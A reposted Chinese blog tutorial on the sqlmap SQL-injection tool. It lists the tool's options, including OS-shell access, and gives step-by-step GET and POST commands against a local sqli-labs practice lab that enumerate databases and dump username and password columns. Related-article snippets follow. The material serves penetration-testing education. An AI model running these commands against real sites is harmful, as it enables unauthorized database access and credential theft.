sqlmap的使用方法(转载)

最新推荐文章于 2025-04-15 01:07:35 发布
最新推荐文章于 2025-04-15 01:07:35 发布
阅读量185 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:https://blog.youkuaiyun.com/qq_41679358/article/details/107619417?utm_medium=distribute.pc_feed.none-task-blog-personrec_tag-8.nonecase&depth_1-utm_source=distribute.pc_feed.none-task-blog-personrec_tag-8.nonecase&request_id=5f21e6062405af26f814c60e
本文详细介绍SQLmap工具的使用方法,包括参数配置、检测SQL注入、枚举数据库信息、操作系统访问等核心功能。通过GET和POST类型的示例,展示如何利用SQLmap进行数据库信息的全面检索。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQLmap的使用
参数
目标:至少要选中一个参数
-u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”)
-g GOOGLEDORK 将谷歌dork的结果作为目标url
请求:
这些选项可用于指定如何连接到目标URL
–data=DATA 数据字符串通过POST发送
–cookie=COOKIE HTTP Cookie的值
–random-agent 随机选择 HTTP User-Agent 头的值
–proxy=PROXY 使用代理去连接目标URL
–tor 使用匿名网络
–check-tor 检查Tor是否正确使用
注入:
这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本
-p TESTPARAMETER 可测试的参数
–dbms=DBMS 将后端DBMS强制到此值
检测:
这些选项可用于定制检测阶段
–level=LEVEL 执行的测试级别(1-5, 默认 1)
–risk=RISK 执行测试的风险 (1-3, 默认 1)
技术:
这些选项可用于调整特定SQL注入的测试的技术
–technique=TECH SQL注入技术选择 (默认 “BEUSTQ”)
枚举:
T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句
-a, --all 检索全部
-b, --banner 检索 banner
–current-user 检索当前用户
–current-db 检索当前数据库
–passwords 列出用户密码的hash值
–tables 列出表
–columns 列出字段
–schema 列出DBMS schema
–dump Dump DBMS数据库表的条目
–dump-all Dump 所有DBMS数据库表的条目
-D DB 指定数据库
-T TBL 指定表
-C COL 指定字段
操作系统访问:
这些选项可用于访问后端数据库管理系统底层操作系统
–os-shell 提示为交互式操作系统shell
–os-pwn 提示为OOB外壳,Meterpreter或VNC
通用:
这些选项可用于设置一些通用的工作参数
–batch 永远不要要求用户输入,使用默认行为
–flush-session 刷新当前目标的会话文件
杂项:
–sqlmap-shell 提示输入交互式sqlmap shell
–wizard 初学者的简单向导界面

用于MySQL注入
GET类型
查找是否有注入点
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --batch

查找数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --dbs --batch

查找当前数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --current-db --batch

查找表
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql --tables --batch

查找表中的列(字段)
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users --columns --batch

查找字段中的数据
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users -C"password,username" --dump --batch

POST类型
查找是否有注入点
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --batch

查找数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --dbs --batch

查找当前数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --current-db --batch

查找表
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql --tables --batch

查找表中的列(字段)
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users --columns --batch

查找字段中的数据
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users -C"password,username" --dump --batch

原文链接:https://blog.youkuaiyun.com/qq_41679358/article/details/107619417?utm_medium=distribute.pc_feed.none-task-blog-personrec_tag-8.nonecase&depth_1-utm_source=distribute.pc_feed.none-task-blog-personrec_tag-8.nonecase&request_id=5f21e6062405af26f814c60e

...XYZ
关注
SQLMAP的下载安装和使用(Windows)
m0_74825699的博客
01-01 1123
SQLMAP是一种开源渗透测试工具,可自动执行SQL注入缺陷的检测和注入过程,并接管数据库服务器。它有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数据获取、访问DBMS操作系统甚至通过带外数据连接的方式执行操作系统的命令,以及从数据库指纹识别、从数据库获取数据、 通过带外连接在操作系统上执行命令。
【网络安全 | 渗透工具】SQLmap精讲(全网最详细图文教程)
等风来
01-06 1万+
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。留言板项目SQLmap渗透实例 | 优快云@秋说本文以目标账号与其它进行讲解。
sqlmap简单命令
weixin_45498140的博客
08-11 602
sqlmap -u “存在注入的地址” --batchbatch-从不询问用户输入,使用所有默认配置。) sqlmap -u “存在注入的地址” --dbs --batch (dbs -枚举数据库管理系统数据库) sqlmap -u “存在注入的地址” --batch -Dcaidian --tables(tables-枚举的DBMS数据库中的表) sqlmap -u “存在注入的地址” --batch -Dcaidian -T flag --columns(columns-枚举DBMS数据库表列)
渗透测试技术----工具使用()--SQLMap使用方法
wwl012345的博客
08-29 2715
一、SQLMap介绍 1.SQLMap简介 SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件,是一款自动进行SQL注入的非常好用的工具。 2.SQLMap支持的数据库 MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、F...
sqlmap注入总结
weixin_34321753的博客
08-22 1598
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9489
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
SQLMAP工具详解
热门推荐
weixin_56218159的博客
06-02 1万+
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4623
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
SQLMAP常用命令速查表
浪子燕青的博客
02-23 3700
title: SQLMAP速查表 copyright: true top: 0 date: 2019-05-20 14:28:16 tags: 渗透测试 categories: 渗透测试 permalink: password: keywords: description: SQLMAP 相关资料,持续更新。 罪人们总是不在意为了邪恶的欲望把痛苦加在别人的身上,却在自己面临刑罚的时候恐惧和哀求。 使用经验总结 在一旦注入成功且获得精确信息通过以下详细参数来指定检索、枚举动作和动作执行对象:检索DBMS的.
sqlmap注入mysql_sqlmap注入系列(高级篇)
weixin_42107561的博客
01-30 1074
前言:软件:burpsqlmap软件配置设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置漏洞环境安装数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt爆出数据库sqlmap -r "/root/22.txt" --dbs爆出表sqlmap -r "22.txt" -D lou --tables爆出表结构sqlmap -r "22.txt" -D lou -T u...
Sqlmap使用教程
最新发布
wrjhs的博客
04-15 1740
SQLMap是一款自动化SQL注入工具,支持检测和利用多种数据库(如MySQL、Oracle、SQL Server等)的注入漏洞,能够获取数据库信息、文件系统访问权限甚至执行操作系统命令。自动化检测注入点:自动识别GET/POST参数、Cookie等位置的注入漏洞。数据提取:获取数据库名、表、字段及数据。绕过WAF:通过篡改脚本绕过Web应用防火墙的检测。操作系统交互:获取Shell权限或执行远程命令。
Sqlmap是什么以及使用方法
qq_59923059的博客
03-31 1万+
前言: Sqlmap是每个渗透测试工程师必备的工具. 一、Sqlmap是什么? 在这个数据无价的时代数据库安全已经成为了重中之重,于是就整理了一下最常用的参数(在我上学的时候学校的数据库天天被我注入php木马.)数据库安全方面的渗透测试工具sqlmap使用. sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,sqlmap还提供了很多脚本.但在实践测试的时候基本用不上.sqlmap使用python开发的.有能力的可以自己编写脚本. sqlmap支持MyS
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4781
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
介绍iBATIS的SQL Map的简单例子
支持开源,支持java,支持Linux
10-29 1799
这篇文章介绍了iBATIS的SQL Map的简单例子。它是一个免费的开放源代码软件。具有以下优点:10、知道怎样操作10种以上的数据库9 、可配置的caching(包括从属)8、支持DataSource、local transaction managemen和global transaction 7、简单的XML配置文档6、支持Map, Collection, List和简单类型包装(如Integ
Sqlmap介绍与使用
CC__Faker的博客
06-07 483
文章目录Sqlmap工具介绍Sqlmap快速上手基础请求爆破获取数据进阶绕过提权其他测试语句参考 Sqlmap工具介绍 sqlmap 是一种开源渗透测试工具,可自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了一个强大的检测引擎,为最终渗透测试人员提供了许多利基功能,以及从数据库指纹识别、从数据库获取数据到访问底层文件系统和通过输出在操作系统上执行命令的广泛切换。带外连接。 下载地址:[http://sqlmap.org/](http://sqlmap.org/) 环境:pytho
如何在cmd快速调用sqlmap
weixin_43455294的博客
10-22 4554
如何在cmd快速调用sqlmap 首先保证你的python环境OK; 创建一个sqlmap.bat文件; 写入python3 "D:\$sqlmap安装路径\sqlmap.py" %*保存退出; win+R,输入sysdm.cpl调出path环境变量设置窗口; 打开path,新建一个,记住是包含bat文件的路径。保存退出。 新打开一个cmd窗口,输入sqlmap看看,OK啦。 ...
SQLmap使用入门
zhugl的博客
03-09 3403
sqlmap是一个强大的开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。当把url交给sqlmap时,若有漏洞sqlmap则会返回数据库版本信息等。 它支持MySQL, Oracle, PostgreSQL, DB2, SQLite等众多数据库 它支持六种SQL注入技术(boolean-based blind, time-based blind, error-bas...
sqlmap介绍及简单实用
我不是大牛
06-25 1万+
Sqlmap使用 一、Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,...
sqlmap参数详细总结(思维导图)
haha1314的博客
05-03 884
一、sqlmap对URL干嘛 二、5中注入模式 三、支持哪些数据库注入 四、详细参数,详解。 1、观察数据 2、获取目标方式 3、请求方式 4、优化 5、探测 6、注入技术 7、列数据 8、数据库管理系统指纹 9、爆破 10、用户定义函数注入 11、系统文件操作 12、操作系统 13、windows注册表操作 14、其他的一些参数 一、sqlmap对URL干嘛 二、5中注入模式 三、支持哪些数...
SQLMAP使用方法
01-04
### SQLMap 使用教程与操作指南 SQLMap 是一款开源的渗透测试工具,用于自动检测和利用SQL注入漏洞。该工具支持多种数据库管理系统(DBMS),包括 MySQL、PostgreSQL 和 Microsoft SQL Server。 #### 启动 SQLMap 并指定目标 URL 为了启动 SQLMap 对特定 Web 应用程序进行测试,可以使用 `-u` 参数来定义目标URL。例如,在给定的目标地址上运行 SQLMap 可以通过如下命令实现[^2]: ```bash sqlmap -u "http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" ``` #### 设置详细的日志级别 增加 verbosity (`-v`) 的数值可以让用户看到更多关于请求的信息。设置为 `1` 表示仅显示重要的信息: ```bash -v 1 ``` #### 指定使用的 DBMS 类型 当已知目标网站所采用的具体数据库系统时,可以通过 `--dbms` 来指明它是什么样的数据库服务器。这有助于提高效率并减少误报的可能性。对于 MySQL 数据库来说,则应这样配置: ```bash --dbms mysql ``` #### 自动化选项 如果不想每次都手动确认每一个提示,默认情况下可以选择启用批处理模式(`--batch ``` #### 枚举所有可用数据库 想要获取当前拥有权限访问的所有数据库列表,可加上参数 `--dbs` : ```bash --dbs ``` 完整的命令组合起来将是这样的形式: ```bash sqlmap -u "http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -v 1 --dbms=mysql --batch --dbs ``` 请注意,在实际环境中应当合法合规地使用此类工具,并始终遵循法律法规以及道德准则来进行安全研究活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值